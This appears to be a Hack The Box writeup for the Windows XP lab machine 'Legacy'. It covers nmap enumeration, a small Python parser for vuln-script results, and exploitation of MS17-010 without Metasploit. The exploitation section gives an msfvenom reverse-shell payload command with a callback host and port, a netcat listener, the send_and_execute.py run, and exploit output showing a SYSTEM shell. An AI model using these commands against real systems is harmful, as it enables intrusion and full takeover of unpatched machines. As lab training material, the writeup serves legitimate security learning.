
Hack The Box - Legacy Writeup


IP            OS        Difficulty   Release Date
10.10.10.4    Windows   Easy         15 March 2017

Enumeration

The first step with any box is a port scan to find open ports and the services running on them.

nmap

nmap -sC -sV -T4 -v 10.10.10.4 -Pn

PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m53s, deviation: 2h07m16s, median: 4d22h57m53s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:76:53 (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-06-20T15:44:43+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Nmap done: 1 IP address (1 host up) scanned in 62.61 seconds

The box does not respond to ping, so we pass the -Pn argument to skip host discovery and scan it anyway. Once we get a response we see that this is a Windows XP/Windows Server box with an SMB server running on ports 139 and 445.

Check SMB for vulnerabilities

SMB versions this old are vulnerable to a few well-known exploits. We can use nmap again, this time with the vuln script category, to check which of these vulnerabilities exist on this box.

kali@kali:~$ nmap --script vuln -p139,445 10.10.10.4 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 06:52 EDT

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 24.48 seconds

Our nmap scan reveals two vulnerabilities: MS08-067 (CVE-2008-4250) and MS17-010 (CVE-2017-0143).
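The vuln-script output above has three kinds of result lines: a one-liner with its value on the header line (false, NT_STATUS_ACCESS_DENIED, ERROR), and a multi-line block with a State: line and CVE ids. As an added example (not part of the original writeup), this parser turns that text into a per-script verdict so that "could not check" results are triaged separately from "not vulnerable"; the sample text is a constructed excerpt modelled on the scan above.

```python
import re
# Constructed excerpt modelled on the `nmap --script vuln` output shown above.
SAMPLE_NMAP = """\
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

# A result starts with "| name:" (block) or "|_name: value" (one-liner); continuation
# lines have two or more spaces after the pipe, so HEADER does not match them.
HEADER = re.compile(r"^\|(?:_| )([A-Za-z0-9-]+):\s*(.*)$")
STATE = re.compile(r"^\|\s+State:\s*(.+?)\s*$")
CVE = re.compile(r"CVE-\d{4}-\d{4,}")

def verdict(state):
    """ERROR / ACCESS_DENIED mean the check could not run, which is not 'clean'."""
    if state == "VULNERABLE":
        return "vulnerable"
    if state in ("false", "NOT VULNERABLE"):
        return "not vulnerable"
    return "inconclusive"

def parse_vuln_scripts(text):
    """Return {script name: {"state": str, "cves": sorted list of CVE ids}}."""
    results, current = {}, None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            current = {"state": m.group(2).strip(), "cves": set()}
            results[m.group(1)] = current
        elif current is not None:
            s = STATE.match(line)
            if s:
                current["state"] = s.group(1)
            current["cves"].update(CVE.findall(line))
    return {n: {"state": r["state"], "cves": sorted(r["cves"])} for n, r in results.items()}

def confirmed_cves(text):
    """CVE ids from scripts reporting VULNERABLE, for patch-priority tickets."""
    return sorted({c for r in parse_vuln_scripts(text).values()
                   if verdict(r["state"]) == "vulnerable" for c in r["cves"]})
```

Scripts that end in ERROR or NT_STATUS_ACCESS_DENIED are reported as inconclusive rather than clean, which is the distinction a patch-verification pass needs.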

Exploitation

Exploiting MS17-010 (without Metasploit)

To gain access to this box we will use the MS17-010 vulnerability. There are several ways to exploit it, but the method used here is an OSCP-friendly, non-Metasploit one.

Download and install impacket

If you don’t have impacket installed, follow the instructions on the GitHub repo.

Download send_and_execute.py

Clone this GitHub repo. We will need the send_and_execute.py python script to send our payload to the box.

Generate our payload with msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe

This command generates a .exe file that opens a reverse TCP shell back to port 443. Be sure to change LHOST to your own IP address (run ifconfig to check it).

Start a netcat listener

Open a new terminal session and run nc -nvlp 443. (Note: make sure the port matches the LPORT used in your msfvenom payload.)

Run the exploit

Now that all of the requirements are met, we can run the exploit with a single command. Open a new terminal session and run the command below, replacing the file path with the location of the payload generated with msfvenom.

python send_and_execute.py 10.10.10.4 /home/kali/Desktop/ms17-010.exe

After a few moments we should see output similar to the following.

Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x820aa9e8
SESSION: 0xe218d3d0
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe228cd50
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe228cdf0
overwriting token UserAndGroups
Sending file Q5OAXA.exe...
Opening SVCManager on 10.10.10.4.....
Creating service fdUr.....
Starting service fdUr.....
The NETBIOS connection with the remote host timed out.
Removing service fdUr.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

The exploit uploads our payload and executes it. Looking at the netcat session we started earlier, we should see that we now have a shell. This is a full administrator shell, and the flags can be found under Documents and Settings in the respective users' folders.

This post is licensed under CC BY 4.0 by the author.